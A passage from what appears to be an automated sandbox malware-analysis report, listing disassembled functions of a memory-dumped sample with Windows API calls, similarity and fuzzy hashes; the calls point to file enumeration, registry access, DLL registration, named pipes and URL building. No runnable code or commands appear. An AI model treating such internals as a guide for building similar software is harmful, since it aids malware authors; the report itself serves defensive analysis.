    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
